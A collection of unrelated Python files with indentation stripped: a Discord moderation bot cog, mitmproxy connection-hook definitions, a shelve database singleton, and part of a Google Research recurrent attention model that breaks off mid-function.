# # Put area and perimeter
# # in a list called "output_list"
# output_list = [area, perimeter]
# # return output_list
# return output_list
|
# Coding=UTF8
# !python
# !/usr/bin/env python3
import discord
from discord.ext import commands
import asyncio, random
from lib import db
from discord_components import Button, ButtonStyle, DiscordComponents
class AdminCmds(commands.Cog):
def __init__(self, client):
self.client = client
@commands.has_permissions(manage_messages=True)
@commands.command(name="purge", aliases=['clear', 'delete'])
async def delete_channel_messages(self, ctx, limit: int=10):
logch = db.field("SELECT LogChannelID FROM adminsettings WHERE GuildID = ?", ctx.guild.id)
await ctx.channel.purge(limit=limit + 1)
await ctx.channel.send(f"<:salute:831807820118622258> Purged `{limit}` messages!")
await asyncio.sleep(2)
await ctx.channel.purge(limit=1)
if logch != 0:
embed = discord.Embed(title="Log Message", timestamp=ctx.message.created_at, color=discord.Color.dark_orange(),
description=f"{ctx.author.mention} used `purge` in <#{ctx.channel.id}> to delete {limit} messages.")
embed.set_footer(text='Delta Δ is the fourth letter of the Greek Alphabet', icon_url=ctx.author.avatar_url)
embed.set_thumbnail(url="https://pandorafms.com/blog/wp-content/uploads/2020/12/567-Logs_-qu%C3%A9-son-y-por-qu%C3%A9-monitorizarlos.jpg")
await self.client.get_channel(logch).send(embed=embed)
@commands.has_permissions(kick_members=True)
@commands.command(name="kick")
async def kick_user(self, ctx, member: discord.Member, reason=None):
logch = db.field("SELECT LogChannelID FROM adminsettings WHERE GuildID = ?", ctx.guild.id)
await member.kick(reason=reason)
await ctx.message.delete()
await ctx.channel.send(f"<:pandacop:831800704372178944> Kicked {member.mention} successfully!")
if logch != 0:
embed=discord.Embed(title="Log Message", timestamp=ctx.message.created_at, color=discord.Color.dark_orange(), description = f"{ctx.author.mention} used `kick` in <#{ctx.channel.id}> to **kick** {member.mention} because `{reason}`")
embed.set_footer(text='Delta Δ is the fourth letter of the Greek Alphabet', icon_url=ctx.author.avatar_url)
embed.set_thumbnail(url="https://pandorafms.com/blog/wp-content/uploads/2020/12/567-Logs_-qu%C3%A9-son-y-por-qu%C3%A9-monitorizarlos.jpg")
await self.client.get_channel(logch).send(embed=embed)
@commands.has_permissions(ban_members=True)
@commands.command(name="ban")
async def ban_user(self, ctx, member: discord.Member, reason=None):
logch = db.field("SELECT LogChannelID FROM adminsettings WHERE GuildID = ?", ctx.guild.id)
await member.ban()
#await ctx.channel.purge(limit=1)
await ctx.message.delete()
await ctx.channel.send(f"<:pandacop:831800704372178944> Banned {member.mention} successfully!")
if logch != 0:
embed=discord.Embed(title="Log Message", timestamp=ctx.message.created_at, color=discord.Color.dark_orange(), description = f"{ctx.author.mention} used `ban` in <#{ctx.channel.id}> to **ban** {member.mention} because `{reason}`")
embed.set_footer(text='Delta Δ is the fourth letter of the Greek Alphabet', icon_url=ctx.author.avatar_url)
embed.set_thumbnail(url="https://pandorafms.com/blog/wp-content/uploads/2020/12/567-Logs_-qu%C3%A9-son-y-por-qu%C3%A9-monitorizarlos.jpg")
await self.client.get_channel(logch).send(embed=embed)
@commands.has_permissions(ban_members=True)
@commands.command(name="unban")
async def unban_user(self, ctx, *, member:discord.User):
logch = db.field("SELECT LogChannelID FROM adminsettings WHERE GuildID = ?", ctx.guild.id)
await ctx.guild.unban(member)
await ctx.channel.purge(limit=1)
await ctx.channel.send(f"<:pandacop:831800704372178944> Unbanned {member.mention} successfully!")
if logch != 0:
embed=discord.Embed(title="Log Message", timestamp=ctx.message.created_at, color=discord.Color.dark_orange(), description = f"{ctx.author.mention} used `unban` in <#{ctx.channel.id}> to **unban** {member.mention}.")
embed.set_footer(text='Delta Δ is the fourth letter of the Greek Alphabet', icon_url=ctx.author.avatar_url)
embed.set_thumbnail(url="https://pandorafms.com/blog/wp-content/uploads/2020/12/567-Logs_-qu%C3%A9-son-y-por-qu%C3%A9-monitorizarlos.jpg")
await self.client.get_channel(logch).send(embed=embed)
@commands.command(name="masskick")
@commands.has_permissions(kick_members=True)
async def masskick(self, ctx, *users: discord.User):
#print(type(users))
logch = db.field("SELECT LogChannelID FROM adminsettings WHERE GuildID = ?", ctx.guild.id)
await asyncio.gather(*map(ctx.guild.kick, users))
await ctx.channel.purge(limit=1)
await ctx.channel.send(f"<:pandacop:831800704372178944> Kicked {len(users)} member/s successfully!")
if logch != 0:
embed=discord.Embed(title="Log Message", timestamp=ctx.message.created_at, color=discord.Color.dark_orange(), description = f"{ctx.author.mention} used `masskick` in <#{ctx.channel.id}> to **kick** `{len(users)}` member/s.")
embed.set_footer(text='Delta Δ is the fourth letter of the Greek Alphabet', icon_url=ctx.author.avatar_url)
embed.set_thumbnail(url="https://pandorafms.com/blog/wp-content/uploads/2020/12/567-Logs_-qu%C3%A9-son-y-por-qu%C3%A9-monitorizarlos.jpg")
await self.client.get_channel(logch).send(embed=embed)
@commands.command(name="massban")
@commands.has_permissions(ban_members=True)
async def massban(self, ctx, *users: discord.User):
logch = db.field("SELECT LogChannelID FROM adminsettings WHERE GuildID = ?", ctx.guild.id)
await asyncio.gather(*map(ctx.guild.ban, users))
await ctx.channel.purge(limit=1)
await ctx.channel.send(f"<:pandacop:831800704372178944> Banned {len(users)} member/s successfully!")
if logch != 0:
embed=discord.Embed(title="Log Message", timestamp=ctx.message.created_at, color=discord.Color.dark_orange(), description = f"{ctx.author.mention} used `massban` in <#{ctx.channel.id}> to **ban** `{len(users)}` member/s.")
embed.set_footer(text='Delta Δ is the fourth letter of the Greek Alphabet', icon_url=ctx.author.avatar_url)
embed.set_thumbnail(url="https://pandorafms.com/blog/wp-content/uploads/2020/12/567-Logs_-qu%C3%A9-son-y-por-qu%C3%A9-monitorizarlos.jpg")
await self.client.get_channel(logch).send(embed=embed)
@commands.command(name="massunban")
@commands.has_permissions(ban_members=True)
async def massunban(self, ctx, *users: discord.User):
logch = db.field("SELECT LogChannelID FROM adminsettings WHERE GuildID = ?", ctx.guild.id)
await asyncio.gather(*map(ctx.guild.unban, users))
await ctx.channel.purge(limit=1)
await ctx.channel.send(f"<:pandacop:831800704372178944> Unbanned {len(users)} member/s successfully!")
if logch != 0:
embed=discord.Embed(title="Log Message", timestamp=ctx.message.created_at, color=discord.Color.dark_orange(), description = f"{ctx.author.mention} used `massunban` in <#{ctx.channel.id}> to **unban** `{len(users)}` member/s.")
embed.set_footer(text='Delta Δ is the fourth letter of the Greek Alphabet', icon_url=ctx.author.avatar_url)
embed.set_thumbnail(url="https://pandorafms.com/blog/wp-content/uploads/2020/12/567-Logs_-qu%C3%A9-son-y-por-qu%C3%A9-monitorizarlos.jpg")
await self.client.get_channel(logch).send(embed=embed)
@commands.has_permissions(manage_channels=True)
@commands.command(name='setlogch')
async def set_log_channel(self, ctx, chid: int):
try:
check_chid = db.field("SELECT LogChannelID FROM adminsettings WHERE GuildID = ?", ctx.guild.id)
check_guild_exists = db.cursor.execute("SELECT 1 FROM adminsettings WHERE GuildID = ? ", (ctx.guild.id,))
check_guild_exists = check_guild_exists.fetchone() is not None
if check_guild_exists == False and chid !=0:
print(ctx.guild.id)
db.execute("INSERT OR IGNORE INTO adminsettings(GuildID, LogChannelID) VALUES(?, ?)", ctx.guild.id, chid)
db.commit()
await ctx.channel.send(f"Log Channel successfully created at <#{chid}>")
if check_guild_exists == True and chid !=0:
db.execute("UPDATE adminsettings SET LogChannelID = ? WHERE GuildID = ?", chid, ctx.guild.id)
db.commit()
elif check_guild_exists == True and check_chid == 0:
db.execute("UPDATE adminsettings SET LogChannelID = ? WHERE GuildID = ?", chid, ctx.guild.id)
db.commit()
logch = db.field("SELECT LogChannelID FROM adminsettings WHERE GuildID = ?", ctx.guild.id)
await self.client.get_channel(logch).send(embed=discord.Embed(title="Log Channel created!", timestamp=ctx.message.created_at, color=discord.Color.dark_orange(), description = f"<#{logch}> has been set as `Log Channel`."))
except Exception as e:
print(e)
await ctx.channel.send("Make sure the bot has permission to read/send messages in the log channel and also provide the ChannelID correctly. ID must be an int.")
@commands.has_permissions(manage_channels=True)
@commands.command(name='deletelogch')
async def delete_log_channel(self, ctx):
#try:
check_guild_exists = db.cursor.execute("SELECT 1 FROM adminsettings WHERE GuildID = ?", (ctx.guild.id,))
#print('got check_guild_exists')
before_delete = db.field("SELECT LogChannelID FROM adminsettings WHERE GuildID = ?", ctx.guild.id)
#print('got before_delete')
check_guild_exists = check_guild_exists.fetchone() is None
#print('got check_guild_exists')
if check_guild_exists == True and before_delete !=0:
#print('check done')
db.execute("UPDATE adminsettings SET LogChannelID = ? WHERE GuildID = ?", 0, ctx.guild.id)
#print('db.execute done')
db.commit()
#print('saved')
await ctx.channel.send(f"Won't log messages in <#{before_delete}> anymore!")
@commands.Cog.listener()
async def on_guild_remove(self, guild):
db.execute("DELETE FROM adminsettings WHERE GuildID = ?", guild.id)
db.commit()
print('removed guild from adminsettings table')
@commands.is_owner()
@commands.command()
async def servers(self, ctx):
activeservers = self.client.guilds
for guild in activeservers:
await ctx.send(guild.name)
await ctx.channel.send(f"{guild.name} - {guild.owner}")
@commands.command(name="verify")
async def verify(self, ctx):
check_guild_exists = db.cursor.execute("SELECT 1 FROM adminsettings WHERE GuildID = ?", (ctx.guild.id,))
check_guild_exists = check_guild_exists.fetchone() is not None
#print(check_guild_exists)
check_verify = db.field("SELECT Verify FROM adminsettings WHERE GuildID = ?", ctx.guild.id)
after_role = db.field("SELECT Roles FROM adminsettings WHERE GuildID = ?", ctx.guild.id)
#print(check_verify)
role = discord.utils.find(lambda r: r.name == after_role, ctx.message.guild.roles)
check_verifych = db.field("SELECT VerifyChID FROM adminsettings WHERE GuildID = ?", ctx.guild.id)
#print(type(check_verifych), type(ctx.channel.id))
#print(check_verify)
#print(check_guild_exists)
if check_verify == 'true' and int(check_verifych) == ctx.channel.id and check_guild_exists == True and role not in ctx.author.roles:
dict = {"apple": "🍎", "banana": "🍌", "meat": "🍗", "grapes": "🍇", "pineapple": "🍍", "airplane": "✈", "car": "🚕", "bird": "🐦", "penguin": "🐧", "horse": "🐴", "frog": "🐸", "hat": "👒"}
keys = random.sample(list(dict), 3)
# print(keys)
target = keys.index(keys[0])
randbuttons = random.sample(list(keys), 3)
#print(randbuttons)
#print(keys[target])
#print(target)
content = [
[
Button(style=ButtonStyle.grey, label=dict[randbuttons[0]], custom_id = randbuttons[0]),
Button(style=ButtonStyle.grey, label=dict[randbuttons[1]], custom_id = randbuttons[1]),
Button(style=ButtonStyle.grey, label=dict[randbuttons[2]], custom_id = randbuttons[2])
]
]
msg = await ctx.channel.send(f"Click on the {keys[0]} emoji to verify. You have 1 minute to do this!", components=content)
while True:
try:
interaction = await self.client.wait_for('button_click', timeout=60)
except asyncio.TimeoutError:
for row in content:
row.disable_components()
return await msg.edit(components=content)
if interaction.author.id != ctx.author.id:
print('non-user')
await interaction.respond(content='This is not your button to click')
elif interaction.author.id == ctx.author.id and interaction.custom_id != keys[target]:
for row in content:
row.disable_components()
await msg.edit("User clicked on the wrong button!", components=content)
return await interaction.respond(content='<:hellno:871582891585437759> Wrong! Do `*verify` to try again.')
elif interaction.author.id == ctx.author.id and interaction.custom_id == keys[target]:
for row in content:
row.disable_components()
await ctx.author.add_roles(role)
print('added role')
return await msg.edit(f"{ctx.author.mention} Welcome to **{ctx.guild.name}**!", components=content)
elif check_verify == 'false' or check_guild_exists == False:
await ctx.reply("<:pandacop:831800704372178944> You cannot run this command since it is not set in the server!")
elif role in ctx.author.roles:
await ctx.reply("You are already Verified")
elif int(check_verifych) != ctx.channel.id:
await ctx.reply(f"This command can only be run in <#{check_verifych}>")
@commands.has_permissions(administrator=True)
@commands.command(name="set_verify")
async def set_verify(self, ctx, operation: str, role: discord.Role = None, channel: discord.TextChannel = 0):
role = role.name if role != None else None
#print(type(channel))
if role != None:
if operation.lower() == 'add' and channel != 0:
#print('executed main')
channel = channel if isinstance(channel, int) else channel.id
check_guild_exists = db.cursor.execute("SELECT 1 FROM adminsettings WHERE GuildID = ?", (ctx.guild.id,))
search_role = discord.utils.find(lambda r:r.name == role, ctx.guild.roles)
print(search_role)
check_guild_exists = check_guild_exists.fetchone() is not None
guild_id_lists = [x.id for x in ctx.guild.text_channels]
#print(check_guild_exists)
#print(channel)
if search_role in ctx.guild.roles:
#print('found')
if operation.lower() == 'add' and check_guild_exists == True and channel in guild_id_lists:
db.execute("UPDATE adminsettings SET Verify = ? WHERE GuildID = ?", "true", ctx.guild.id)
db.execute("UPDATE adminsettings SET VerifyChID = ? WHERE GuildID = ?", channel, ctx.guild.id)
db.execute("UPDATE adminsettings SET Roles = ? WHERE GuildID = ?", role, ctx.guild.id)
db.commit()
#print('add executed')
await ctx.reply(f"<:verify:910515823590912010> Verification System has been turned on for **{ctx.guild.name}** successfully!")
#elif channel not in guild_id_lists:
#print('channel not in this guild')
if operation.lower() == 'add' and check_guild_exists == False and channel in guild_id_lists:
db.execute('INSERT OR IGNORE INTO adminsettings(GuildID, Verify, VerifyChID, Roles) VALUES(?, ?, ?, ?)', ctx.guild.id, "true", channel, role)
db.commit()
await ctx.reply(f"<:verify:910515823590912010> Verification System has been turned on for **{ctx.guild.name}** successfully!")
#print('add #2 executed')
#elif channel not in guild_id_lists:
#print("channel not in this guild(#2)")
else:
await ctx.reply(f"<:hellno:871582891585437759> Role, {role} Was Not Found!")
elif operation.lower() == 'add' and channel == 0:
embed = discord.Embed(title="<:hellno:871582891585437759> Missing Arguments",
description="```ini\nMissing Argument: [channel]```",
timestamp=ctx.message.created_at, color=discord.Color.dark_grey())
await ctx.send(embed=embed)
elif role == None and operation.lower() == 'add':
await ctx.channel.send("Role cannot be empty!!")
check_guild_exists = db.cursor.execute("SELECT 1 FROM adminsettings WHERE GuildID = ?", (ctx.guild.id,))
check_guild_exists = check_guild_exists.fetchone() is not None
if check_guild_exists:
check_verify_state = db.field("SELECT Verify FROM adminsettings WHERE GuildID = ?", ctx.guild.id)
#print(check_verify_state)
if operation.lower() == 'delete' and check_guild_exists == True and check_verify_state != 'false':
db.execute("UPDATE adminsettings SET Verify = ?, VerifyChID = ?, Roles = ? WHERE GuildID = ?", "false", None, None, ctx.guild.id)
db.commit()
#print('executed delete')
await ctx.reply(f'<:salute:831807820118622258> Disabled verification for **{ctx.guild.name}**!')
#print('executed add')
elif operation.lower() == 'delete' and check_guild_exists == False:
#print('cannot execute delete since no value is set.')
await ctx.reply("<:hellno:871582891585437759> Cannot disable verify if it has never been set in the server!")
elif operation.lower() == 'delete' and check_verify_state == 'false' and check_guild_exists == True:
await ctx.reply("<:hellno:871582891585437759> Cannot disable verify more than once!")
@commands.Cog.listener()
async def on_guild_remove(self, guild):
db.execute("DELETE FROM adminsettings WHERE GuildID = ?", guild.id)
db.commit()
print('removed guild from adminsettings table')
# @commands.command(name='temp')
# async def temp(self, ctx):
# #print(ctx.guild.roles.name)
# db.execute("ALTER TABLE adminsettings ADD COLUMN Verify")
# db.execute("ALTER TABLE adminsettings ADD COLUMN VerifyChID")
# db.execute("ALTER TABLE adminsettings ADD COLUMN Roles")
# db.commit()
# #search_role = discord.utils.find(lambda r:r.name == 'deez nutz', ctx.guild.roles)
# #await ctx.send(ctx.author.roles)
# #if search_role in ctx.guild.roles:
# #await ctx.channel.send('found')
# await ctx.channel.send("Executed temp")
@set_verify.error
async def set_verify_error_handling(self, ctx, error):
if isinstance(error, commands.MissingPermissions):
await ctx.channel.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Permissions", description="```prolog\nYou must have the Administrator permission to use that command!```", timestamp=ctx.message.created_at, color=discord.Color.blue()))
if isinstance(error, commands.MissingRequiredArgument):
await ctx.channel.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Required Argument", description="```ini\nMake sure you have run the command providing the [option], [role] and the [channel] parameters correctly!```", timestamp=ctx.message.created_at, color=discord.Color.blue()))
@set_log_channel.error
async def setlogch_error_handling(self, ctx, error):
if isinstance(error, commands.MissingPermissions):
await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Permissions", description="```prolog\nYou must have the Manage Channels permission to use that command!```", timestamp=ctx.message.created_at, color=discord.Color.magenta()))
if isinstance(error, commands.MissingRequiredArgument):
await ctx.channel.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Required Argument", description="```ini\nMake sure you have run the command providing the [channel-id] parameter correctly!```", timestamp=ctx.message.created_at, color=discord.Color.blue()))
@delete_log_channel.error
async def deletelogch_error_handling(self, ctx, error):
if isinstance(error, commands.MissingPermissions):
await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Permissions", description="```prolog\nYou must have the Manage Channels permission to use that command!```", timestamp=ctx.message.created_at, color=discord.Color.magenta()))
@masskick.error
async def kick_error_handling(self, ctx, error):
if isinstance(error, commands.MissingPermissions):
await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Permissions", description="```prolog\nYou must have the Kick Members permission to use that command!```", timestamp=ctx.message.created_at, color=discord.Color.magenta()))
if isinstance(error, commands.UserNotFound):
await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description="```ini\nSorry, the [member] you provided does not exists in the server.```"))
if isinstance(error, commands.MissingRequiredArgument):
await ctx.channel.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Required Argument", description="```ini\nMake sure you have run the command providing the [member(s)] parameter correctly!```", timestamp=ctx.message.created_at, color=discord.Color.blue()))
@massban.error
async def ban_error_handling(self, ctx, error):
if isinstance(error, commands.MissingPermissions):
await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Permissions", description="```prolog\nYou must have the Ban Members permission to use that command!```"), timestamp=ctx.message.created_at, color=discord.Color.greyple())
if isinstance(error, commands.UserNotFound):
await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description='```ini\nSorry, the [member] you provided does not exists in the server.```', timestamp=ctx.message.created_at, color=discord.Color.blurple()))
if isinstance(error, commands.MissingRequiredArgument):
await ctx.channel.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Required Argument", description="```ini\nMake sure you have run the command providing the [member(s)] parameter correctly!```", timestamp=ctx.message.created_at, color=discord.Color.blue()))
@massunban.error
async def ban_error_handling(self, ctx, error):
if isinstance(error, commands.MissingPermissions):
await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Permissions", description='```prolog\nYou must have the Ban Members permission to use that command!```', timestamp=ctx.message.created_at, color=discord.Color.gold()))
if isinstance(error, commands.UserNotFound):
await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description='```ini\nSorry, the [member] you provided does not exists in the server.```', timestamp=ctx.message.created_at, color=discord.Color.blurple()))
if isinstance(error, commands.MissingRequiredArgument):
await ctx.channel.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Required Argument", description="```ini\nMake sure you have run the command providing the [member(s)] parameter correctly!```", timestamp=ctx.message.created_at, color=discord.Color.blue()))
@delete_channel_messages.error
async def purge_error_handling(self, ctx, error):
if isinstance(error, commands.MissingPermissions):
await ctx.channel.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Permissions", description="```prolog\nYou must have the Manage Messages permission to use that command!```", timestamp=ctx.message.created_at, color=discord.Color.blue()))
@kick_user.error
async def kick_error_handling(self, ctx, error):
if isinstance(error, commands.MissingPermissions):
await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Permissions", description="```prolog\nYou must have the Kick Members permission to use that command!```", timestamp=ctx.message.created_at, color=discord.Color.magenta()))
if isinstance(error, commands.MemberNotFound):
await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description="```ini\nSorry, the [member] you provided does not exists in the server.```"))
if isinstance(error, commands.MissingRequiredArgument):
await ctx.channel.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Required Argument", description="```ini\nMake sure you have run the command providing the [member] and the [reason] parameters correctly!```", timestamp=ctx.message.created_at, color=discord.Color.blue()))
@ban_user.error
async def ban_error_handling(self, ctx, error):
if isinstance(error, commands.MissingPermissions):
await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Permissions", description="```prolog\nYou must have the Ban Members permission to use that command!```", timestamp=ctx.message.created_at, color=discord.Color.greyple()))
if isinstance(error, commands.MemberNotFound):
await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description='```ini\nSorry, the [member] you provided does not exists in the server.```', timestamp=ctx.message.created_at, color=discord.Color.blurple()))
if isinstance(error, commands.MissingRequiredArgument):
await ctx.channel.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Required Argument", description="```ini\nMake sure you have run the command providing the [member] and the [reason] parameters correctly!```", timestamp=ctx.message.created_at, color=discord.Color.blue()))
@unban_user.error
async def ban_error_handling(self, ctx, error):
if isinstance(error, commands.MissingPermissions):
await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Permissions", description='```prolog\nYou must have the Ban Members permission to use that command!```', timestamp=ctx.message.created_at, color=discord.Color.gold()))
if isinstance(error, commands.MissingRequiredArgument):
await ctx.channel.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Required Argument", description="```ini\nMake sure you have run the command providing the [member] parameter correctly!```", timestamp=ctx.message.created_at, color=discord.Color.blue()))
# @commands.command(name="lockdown")
# @commands.has_guild_permissions(manage_channels=True)
# @commands.bot_has_guild_permissions(manage_channels=True)
# async def lockdown(self, ctx, channel:discord.TextChannel=None):
# channel = channel or ctx.channel
# if ctx.guild.default_role not in channel.overwrites:
# overwrites = {ctx.guild.default_role : discord.PermissionOverwrite(send_messages=False)}
# await channel.edit(overwrites=overwrites)
# print('done #1')
# await ctx.send(f"`{channel.name}` is on Lockdown!!!")
#
# elif channel.overwrites[ctx.guild.default_role].send_messages == True or channel.overwrites[ctx.guild.default_role].send_messages == None:
# overwrites = channel.overwrites[ctx.guild.default_role]
# overwrites.send_messages = False
# await channel.set_permissions(ctx.guild.default_role, overwrite=overwrites)
# print('done #2')
# await ctx.send(f"`{channel.name}` is on Lockdown!!!")
#
#
#
#
# @commands.has_guild_permissions(manage_channels=True)
# @commands.bot_has_guild_permissions(manage_channels=True)
# @commands.command(name="unlock")
# async def unlock(self, ctx):
# await ctx.channel.set_permissions(ctx.guild.default_role, send_messages=True)
# await ctx.send(ctx.channel.name + " has been unlocked.")
# @lockdown.error
# async def lockdown_error_handling(self, ctx, error):
# if isinstance(error, commands.MissingPermissions):
# await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Permissions", description="```prolog\nYou must have the Manage Channels permission to use that command!```", timestamp=ctx.message.created_at, color=discord.Color.dark_grey()))
#
# @unlock.error
# async def unlock_error_handling(self, error, ctx):
# if isinstance(error, commands.MissingPermissions):
# await ctx.channel.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Permissions", description="```prolog\nYou must have the Manage Channels permission to use that command!", timestamp=ctx.message.created_at, color=discord.Color.dark_orange()))
def setup(client):
client.add_cog(AdminCmds(client))
|
from dataclasses import dataclass
from mitmproxy import connection
from . import commands
@dataclass
class ClientConnectedHook(commands.StartHook):
"""
A client has connected to mitmproxy. Note that a connection can
correspond to multiple HTTP requests.
Setting client.error kills the connection.
"""
client: connection.Client
@dataclass
class ClientDisconnectedHook(commands.StartHook):
"""
A client connection has been closed (either by us or the client).
"""
client: connection.Client
@dataclass
class ServerConnectionHookData:
"""Event data for server connection event hooks."""
server: connection.Server
"""The server connection this hook is about."""
client: connection.Client
"""The client on the other end."""
@dataclass
class ServerConnectHook(commands.StartHook):
"""
Mitmproxy is about to connect to a server.
Note that a connection can correspond to multiple requests.
Setting data.server.error kills the connection.
"""
data: ServerConnectionHookData
@dataclass
class ServerConnectedHook(commands.StartHook):
"""
Mitmproxy has connected to a server.
"""
data: ServerConnectionHookData
@dataclass
class ServerDisconnectedHook(commands.StartHook):
"""
A server connection has been closed (either by us or the server).
"""
data: ServerConnectionHookData
|
import shelve
# Pattern Singleton
class MetaSingleton(type):
_instances = {}
def __call__(cls, *args, **kwargs):
if cls not in cls._instances:
cls._instances[cls] = super(MetaSingleton, cls).__call__(*args, **kwargs)
return cls._instances[cls]
class DataBaseController(metaclass=MetaSingleton):
db = None
def __init__(self):
self.db = shelve.open('database.db', writeback=True)
def set(self, key, value):
try:
self.db[key] = value
except ValueError:
pass
def get(self, key):
try:
return self.db[key]
except ValueError:
return None
def dict(self):
return self.db
def sync(self):
try:
self.db.sync()
except ValueError:
pass
def close(self):
self.db.sync()
self.db.close()
def addVKSubscriber(self, subscriber_id, profile_id):
"""
:param subscriber_id: TgUID
:param profile_id: VKUID
:return: void
"""
def get_subscriber(self, profile_id):
"""
:param profile_id: VKID
:return: List<TgUID>
"""
|
# coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Deep recurrent attention model (DRAM).
Model based on https://arxiv.org/abs/1412.7755
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import tensorflow.compat.v1 as tf
from saccader.visual_attention import classification_model
from saccader.visual_attention import emission_model
from saccader.visual_attention import glimpse_model
class DRAMCell(object):
"""Deep Recurrent Attention Model Cell.
Recurrent neural network that performs classification on images by taking
glimpses at different locations on an image.
Attributes:
config: (Configuration object) With parameters:
num_units_rnn_layers: List of Integers indicating number of units in each
rnn layer. Length of list = 2 as there are two rnn layers.
rnn_activation: Activation function.
rnn_dropout_rate: Dropout rate for both input and output.
cell_type: RNN cell type ("lstm" or "gru").
num_resolutions: (Integer) Number of image resolutions used.
rnn_layers: List of RNN layers.
emission_net: Emission network object.
glimpse_net: Glimpse network object.
classification_net: Classification network object.
init_op: Initialization operations for model variables.
zero_states: List of zero states of RNN layers.
var_list_location: List of variables for the location network.
var_list_classification: List of variables for the classification network.
var_list: List of all model variables.
"""
def __init__(self, config):
"""Init.
Args:
config: ConfigDict object with model parameters (see dram_config.py).
"""
self.config = copy.deepcopy(config)
if len(self.config.num_units_rnn_layers) != 2:
raise ValueError("num_units_rnn_layers should be a list of length 2.")
self.cell_type = self.config.cell_type
glimpse_model_config = self.config.glimpse_model_config
emission_model_config = self.config.emission_model_config
classification_model_config = self.config.classification_model_config
classification_model_config.num_classes = self.config.num_classes
glimpse_model_config.glimpse_shape = self.config.glimpse_shape
glimpse_model_config.num_resolutions = self.config.num_resolutions
self.glimpse_net = glimpse_model.GlimpseNetwork(glimpse_model_config)
self.emission_net = emission_model.EmissionNetwork(
emission_model_config)
self.classification_net = classification_model.ClassificationNetwork(
classification_model_config)
self.rnn_layers = []
self.zero_states = []
for num_units in self.config.num_units_rnn_layers:
if self.cell_type == "lstm":
rnn_layer = tf.nn.rnn_cell.LSTMCell(
num_units, state_is_tuple=True,
activation=self.config.rnn_activation)
elif self.cell_type == "gru":
rnn_layer = tf.nn.rnn_cell.GRUCell(
num_units, activation=self.config.rnn_activation)
self.rnn_layers.append(rnn_layer)
self.zero_states.append(rnn_layer.zero_state)
self.zero_states = self.zero_states
self.var_list = []
self.var_list_location = []
self.var_list_classification = []
self.init_op = None
def collect_variables(self):
"""Collects model variables.
Populates self.var_list with model variables and self.init_op with
variables' initializer. This function is only called once with __call__.
"""
# Add glimpse network variables.
self.var_list_classification += self.glimpse_net.var_list
# Add emission network variables.
self.var_list_location += self.emission_net.var_list
# Add classification network variables.
self.var_list_classification += self.classification_net.var_list
# Add rnn variables for classification layer.
self.var_list_classification += self.rnn_layers[0].weights
# Add rnn variables for location layer.
self.var_list_location += self.rnn_layers[1].weights
# All variables.
self.var_list = self.var_list_classification + self.var_list_location
self.init_op = tf.variables_initializer(var_list=self.var_list)
def __call__(self,
images,
locations,
state_rnn,
use_resolution,
prev_locations=None,
is_training=False,
policy="learned",
sampling_stddev=1e-5,
stop_gradient_between_cells=False,
stop_gradient_after_glimpse=False):
"""Builds DRAM cell.
Args:
images: 4-D Tensor of shape [batch, height, width, channels].
locations: Glimpse location.
state_rnn: Tuple of size two for the state of RNN layers.
use_resolution: (List of Boolean of size num_resolutions) Indicates which
resolutions to use from high (small receptive field)
to low (wide receptive field). None indicates use all resolutions.
prev_locations: If not None, add prev_locations to current proposed
locations (i.e. using relative locations).
is_training: (Boolean) To indicate training or inference modes.
policy: (String) 'learned': uses learned policy, 'random': uses random
policy, or 'center': uses center look policy.
sampling_stddev: Sampling distribution standard deviation.
stop_gradient_between_cells: (Boolean) Whether to stop the gradient
between the classification and location sub cells of the DRAM cell.
stop_gradient_after_glimpse: (Boolean) Whether to stop the gradient
after the glimpse net output.
Returns:
logits: Model logits.
locations: New glimpse location.
state_rnn: Tuple of length two for the new state of RNN layers.
"""
if self.var_list:
reuse = True
else:
reuse = False
if is_training and self.config.rnn_dropout_rate > 0:
keep_prob = 1.0 - self.config.rnn_dropout_rate
rnn_layers = []
for layer in self.rnn_layers:
rnn_layers.append(
tf.nn.rnn_cell.DropoutWrapper(
layer, input_keep_prob=keep_prob, output_keep_prob=keep_prob))
else:
rnn_layers = self.rnn_layers
endpoints = {}
glimpse_size = tf.cast(self.glimpse_net.glimpse_shape[0], dtype=tf.float32)
image_size = tf.cast(tf.shape(images)[1], dtype=tf.float32)
# Ensure glimpses within image.
location_scale = 1. - glimpse_size / image_size
with tf.name_scope("glimpse_network"):
# First rnn layer (for classification).
g, endpoints["glimpse_network"] = self.glimpse_net(
images, locations, is_training=is_training,
use_resolution=use_resolution)
with tf.variable_scope("dram_cell_0", reuse=reuse):
if stop_gradient_after_glimpse:
input_rnn_classification = tf.stop_gradient(g)
else:
